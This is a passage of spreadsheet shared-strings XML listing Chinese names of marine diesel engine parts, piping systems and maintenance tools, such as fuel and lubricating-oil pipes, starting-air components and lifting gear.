  <si>
    <t xml:space="preserve">刮油环上部壳体                                           </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环下部壳体                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上刮油环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">下刮油环                                              </t>
  </si>
  <si>
    <t xml:space="preserve">喷水管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">前止动块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">后止动块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止动块螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推环总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推环上部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止推环下部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">拉拔螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">手拧螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥螺钉                                               </t>
  </si>
  <si>
    <t xml:space="preserve">甩油环上部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">甩油环下部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滴油盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滴油盘支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力块转出工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力块提升横梁                                           </t>
  </si>
  <si>
    <t xml:space="preserve">桥规                                                </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴提升螺栓                                           </t>
  </si>
  <si>
    <t xml:space="preserve">传动螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺钉拆除                                              </t>
  </si>
  <si>
    <t xml:space="preserve">销规                                                </t>
  </si>
  <si>
    <t xml:space="preserve">止动块固紧量规                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">移动燃油支架                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高压管道                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油高压管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">接管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">绝缘管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">联接螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">防护管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油回油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泄油管支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">调整螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">泄油装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油出油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸部分支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泄漏报警                                            </t>
  </si>
  <si>
    <t xml:space="preserve">污油回油箱出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">到污油盘的泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油进口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油出口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管系                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油回口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滤器泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">泵泄放                                               </t>
  </si>
  <si>
    <t xml:space="preserve">旁通泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">输送管盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气缸部分管夹                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油排放支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸盖支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封油支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油连接布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">输送管帽盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油进口支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油仪表安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">挠性软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">惰性气体支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油泵支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">挠性连接安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油喷油管装配图                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扇形块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拆分式衬套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">圆柱形密封圈                                            </t>
  </si>
  <si>
    <t xml:space="preserve">压力圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺口插座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">挠性软管盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管夹支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">警报室                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管备件图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油进油支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油回油支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油回油支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">颈法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">腰形鞍状法兰                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泄放盒管子                                             </t>
  </si>
  <si>
    <t xml:space="preserve">分配器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分配器底座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">分配体                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑阀壳体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">箱盖                                                </t>
  </si>
  <si>
    <t xml:space="preserve">隔板壳体                                              </t>
  </si>
  <si>
    <t xml:space="preserve">旋入衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀.样本                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管研磨轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油管切割机                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高压燃油管磨削工具体                                        </t>
  </si>
  <si>
    <t xml:space="preserve">高压燃油管磨削工具接头                                       </t>
  </si>
  <si>
    <t xml:space="preserve">高压油管磨削工具导轨                                        </t>
  </si>
  <si>
    <t xml:space="preserve">滑油支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">法兰护罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">清洗油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油泵清洗系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洗油原理图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">套筒扳手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">改进蝶阀                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却油支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扭振减振器滑油管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">气缸润滑油主管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">机座泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸滑油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮侧各种管子                                           </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油管外护罩                                            </t>
  </si>
  <si>
    <t xml:space="preserve">透气管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">超速停车管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">气缸油管支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体泄放管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">气缸体泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扫气排泄管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管泄放管支撑                                         </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">放气阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力表接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">出口管支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">SAE法兰适配体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">漏油螺塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">直联接头块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">90度联接块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高压管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">高压管法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">管头                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滑油进口管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">密封油进油支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封油出油支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">管子封板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">输出端滑油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滑油布置图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油进油泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套滑油                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮摇臂滑油管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂滑油管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">吸油管滑油出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">输入热动阀泵出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水进口热动阀出口                                        </t>
  </si>
  <si>
    <t xml:space="preserve">冷却器热动阀出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">滑油分配器管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油管布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器泄放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">调压阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管底板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">限制                                                </t>
  </si>
  <si>
    <t xml:space="preserve">液位开关布置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器滑油管护套                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器滑油进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">密封油过滤器进口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">密封油过滤器出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">密封油过滤器悬挂                                          </t>
  </si>
  <si>
    <t xml:space="preserve">分配支管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">磁性滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑油系统I                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油系统II                                            </t>
  </si>
  <si>
    <t xml:space="preserve">强制润滑油布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">手轮泵支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">手轮泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">恒温阀进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">恒温阀出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油滤器进口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滤芯                                                </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵/调速器滑油管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">调速器出口压力                                           </t>
  </si>
  <si>
    <t xml:space="preserve">流量开关支管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">发电机滑油进油管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">板式冷却器护罩                                           </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮驱动润滑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">密封油布置图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">壳体再加工                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滑油管限制                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气管螺柱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气进口堵头                                          </t>
  </si>
  <si>
    <t xml:space="preserve">防爆帽                                               </t>
  </si>
  <si>
    <t xml:space="preserve">壳体                                                </t>
  </si>
  <si>
    <t xml:space="preserve">止动垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁止板定位销                                            </t>
  </si>
  <si>
    <t xml:space="preserve">多孔转筒                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止动板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">防爆帽盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器控制空气管                                      </t>
  </si>
  <si>
    <t xml:space="preserve">密封空气管支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀控制空气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">防爆板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气调整螺丝                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气进口                                            </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">停车阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">空气管限位                                             </t>
  </si>
  <si>
    <t xml:space="preserve">遥控系统图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器滑油管                                        </t>
  </si>
  <si>
    <t xml:space="preserve">管夹角外形                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压泵空气布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷气助推器小孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">适配器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器法兰                                         </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">控制空气管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">不带接头的焊接联轴器                                        </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进口-出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进口主管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进口堵头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进口管法兰                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水泄放管支撑                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水泄放管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">节流孔板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">温度计部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">增压气排气管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">增压器清洗泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器清洗管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器卸放管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器泄放管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器排气管支撑                                          </t>
  </si>
  <si>
    <t xml:space="preserve">辅助鼓风机泄放管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">泄放管支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器冷却水管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柱                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器底板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">滴水分离器顶块                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水出口管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">方盲法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弯接头                                               </t>
  </si>
  <si>
    <t xml:space="preserve">椭圆垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水I                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水II                                             </t>
  </si>
  <si>
    <t xml:space="preserve">低温中间管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高温集管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">低温出口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">淡水出口进入发动机的量                                       </t>
  </si>
  <si>
    <t xml:space="preserve">增压器高温进口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水集管支管                                           </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器出口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空冷器进口                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高温分配器管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水恒温阀安装                                          </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水恒温阀布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">恒温阀外壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">盲件                                                </t>
  </si>
  <si>
    <t xml:space="preserve">PI01用管子                                           </t>
  </si>
  <si>
    <t xml:space="preserve"> PI10用管子                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气/滑油冷却器出口                                      </t>
  </si>
  <si>
    <t xml:space="preserve">扫气空气/滑油冷却器进口                                      </t>
  </si>
  <si>
    <t xml:space="preserve">滑油冷却器出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">温度计部件（毛坯）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">夹子固定板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">夹子底板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">高温中间管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">恒温阀高温出口                                           </t>
  </si>
  <si>
    <t xml:space="preserve">淡水进口                                              </t>
  </si>
  <si>
    <t xml:space="preserve">分配器支管                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">高压三通接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">低压三通接头                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高压弯管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柔性钢管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">高压管总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">固定螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">密封油单元                                             </t>
  </si>
  <si>
    <t xml:space="preserve">迷你阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内六角固定螺钉                                           </t>
  </si>
  <si>
    <t xml:space="preserve">活塞外壳                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">十字接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油气分离器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">空气管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">密封                                                </t>
  </si>
  <si>
    <t xml:space="preserve">排气/空气进口管安装                                        </t>
  </si>
  <si>
    <t xml:space="preserve">支撑角                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气体吸收装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">脉冲转换器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">霍尔效应监测器安装                                         </t>
  </si>
  <si>
    <t xml:space="preserve">排气/空气进气管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">节流阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">火焰清除器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扫气集管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">节流阀连接                                             </t>
  </si>
  <si>
    <t xml:space="preserve">保护格栅                                              </t>
  </si>
  <si>
    <t xml:space="preserve">减振板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承支撑安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">交流发电机规格                                           </t>
  </si>
  <si>
    <t xml:space="preserve">对中程序                                              </t>
  </si>
  <si>
    <t xml:space="preserve">通用液压工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机提升工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">顶部提升工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座起吊工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴起吊工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机提升吊环螺母                                         </t>
  </si>
  <si>
    <t xml:space="preserve">底板提升总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮下部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮上部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力块VOC进口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">推力块VOC出口                                          </t>
  </si>
  <si>
    <t xml:space="preserve">推力块润滑控制                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泄放阀测试块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制/密封油泄放管                                         </t>
  </si>
  <si>
    <t xml:space="preserve">VOC对角附件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">切断阀测试块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">U形环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">打磨工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀座拆卸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">磨床                                                </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器清洗工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">止回阀工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">最大压力指示器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">指示器供图                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备件和工具箱                                            </t>
  </si>
  <si>
    <t xml:space="preserve">标准备件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">冲压机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">填充物                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油阀测试工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">氮气接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">空气压力滤器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">放大镜                                               </t>
  </si>
  <si>
    <t xml:space="preserve">平衡器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">打磨机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">模板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">维护工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀打磨工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">棘轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">堵塞                                                </t>
  </si>
  <si>
    <t xml:space="preserve">工具箱图                                              </t>
  </si>
  <si>
    <t xml:space="preserve">低拆卸高度工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">校准工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钩子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">水平环座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">斜环座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">管+管支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">普通维护标准工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">麻花钻                                               </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀塞安装冲头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">手动链辘轳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">提升横梁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调整工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承上瓦工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">钢丝                                                </t>
  </si>
  <si>
    <t xml:space="preserve">锁扣工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">千斤顶                                               </t>
  </si>
  <si>
    <t xml:space="preserve">工具箱总成                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀座表面修理机                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压力测试工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">螺纹套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">取出器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">链条                                                </t>
  </si>
  <si>
    <t xml:space="preserve">轮子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴甩档测量工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">磁铁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">维修服务工具车                                           </t>
  </si>
  <si>
    <t xml:space="preserve">额外工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工具车                                               </t>
  </si>
  <si>
    <t xml:space="preserve">钻孔机                                               </t>
  </si>
  <si>
    <t xml:space="preserve">注射器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">CE标记供图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">卸扣                                                </t>
  </si>
  <si>
    <t xml:space="preserve">气缸单元备件箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">CE标记液压工具                                          </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴甩档测量工具说明书                                       </t>
  </si>
  <si>
    <t xml:space="preserve">吊索横梁                                              </t>
  </si>
  <si>
    <t xml:space="preserve">六角钢                                               </t>
  </si>
  <si>
    <t xml:space="preserve">塑料软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">钢丝网                                               </t>
  </si>
  <si>
    <t xml:space="preserve">木箱底板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">木箱盖                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扳手                                                </t>
  </si>
  <si>
    <t xml:space="preserve">压缩工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">横杆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">吊环螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">公快速接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">清洗工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">接长接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">缩径块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞环扩张器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">定位管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扭力板手                                              </t>
  </si>
  <si>
    <t xml:space="preserve">圆螺母                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力泵                                               </t>
  </si>
  <si>
    <t xml:space="preserve">压力计固定                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接螺母板手                                            </t>
  </si>
  <si>
    <t xml:space="preserve">提升带                                               </t>
  </si>
  <si>
    <t xml:space="preserve">油箱                                                </t>
  </si>
  <si>
    <t xml:space="preserve">铁板护罩                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工具板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">工具板安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">铭牌安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压克力板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">工具面板总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">起吊布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扳手支撑                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油泵取出器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带环六角螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内径极限规                                             </t>
  </si>
  <si>
    <t xml:space="preserve">高压软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气阀座环取出器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">球柄                                                </t>
  </si>
  <si>
    <t xml:space="preserve">砂轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">铰床                                                </t>
  </si>
  <si>
    <t xml:space="preserve">拆除工具中间块                                           </t>
  </si>
  <si>
    <t xml:space="preserve">液压拉伸器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">打磨台平板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">打磨台销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">打磨台螺母                                             </t>
